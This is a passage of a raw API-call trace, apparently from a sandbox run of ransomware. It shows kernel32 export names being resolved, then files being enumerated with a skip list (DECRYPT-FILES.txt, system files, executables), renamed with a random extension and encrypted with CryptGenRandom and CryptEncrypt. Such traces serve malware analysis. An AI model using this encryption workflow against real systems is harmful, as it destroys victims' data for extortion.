(in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.137] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.137] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.137] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.137] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.137] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.137] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.137] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.137] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.138] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.138] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.138] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.138] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.138] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.138] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.138] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.138] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.138] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.138] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.138] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.138] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.138] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.138] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.138] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.138] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.138] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.138] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.138] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.139] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.139] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.139] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.139] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.139] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.139] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.139] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.139] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.139] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.139] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.139] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.139] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.139] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.139] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.139] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.139] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.139] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.139] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.139] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.140] lstrlenA (lpString="DELETEATOM") returned 10 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.140] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.140] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.140] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.140] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.140] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.140] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.140] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.140] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.140] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.140] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.140] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.140] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.140] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.140] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.140] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.140] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.140] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.140] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.141] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.141] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.141] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.141] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.141] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.141] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.141] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.141] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.141] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.141] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.141] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.141] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.141] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.141] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.141] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.141] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.141] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.141] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.142] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.142] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.142] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.142] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.142] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.142] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms") returned 128 [0080.142] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms.l1Nd7a") returned 135 [0080.142] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms.l1Nd7a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms.l1nd7a"), dwFlags=0x0) returned 1 [0080.143] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.143] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.143] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.144] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2da822a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2daa8400, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x43a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="5afe4de1b92fc382.customDestinations-ms", cAlternateFileName="5AFE4D~1.CUS")) returned 1 [0080.144] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="DECRYPT-FILES.txt") returned -1 [0080.144] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="autorun.inf") returned -1 [0080.144] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="boot.ini") returned -1 [0080.144] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="desktop.ini") returned -1 [0080.144] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="ntuser.dat") returned -1 [0080.144] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="iconcache.db") returned -1 [0080.144] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="bootsect.bak") returned -1 [0080.144] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="ntuser.dat.log") returned -1 [0080.144] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="thumbs.db") returned -1 [0080.144] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="Bootfont.bin") returned -1 [0080.144] lstrlenW (lpString="5afe4de1b92fc382.customDestinations-ms") returned 38 [0080.144] lstrcmpiW (lpString1="customDestinations-ms", lpString2="lnk") returned -1 [0080.144] lstrcmpiW (lpString1="customDestinations-ms", lpString2="exe") returned -1 [0080.144] lstrcmpiW (lpString1="customDestinations-ms", lpString2="sys") returned -1 [0080.144] lstrcmpiW (lpString1="customDestinations-ms", lpString2="dll") returned -1 [0080.144] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0080.144] lstrlenW (lpString="5afe4de1b92fc382.customDestinations-ms") returned 38 [0080.144] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0080.144] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="5afe4de1b92fc382.customDestinations-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" [0080.144] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.144] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.145] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=17315) returned 1 [0080.145] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.145] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.146] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.146] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.146] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.147] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.147] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.148] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.148] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.149] CloseHandle (hObject=0x464) returned 1 [0080.149] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.149] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.150] CloseHandle (hObject=0x0) returned 0 [0080.150] CloseHandle (hObject=0x460) returned 1 [0080.151] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.151] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.151] GetTickCount () returned 0x114c86e [0080.151] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.151] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 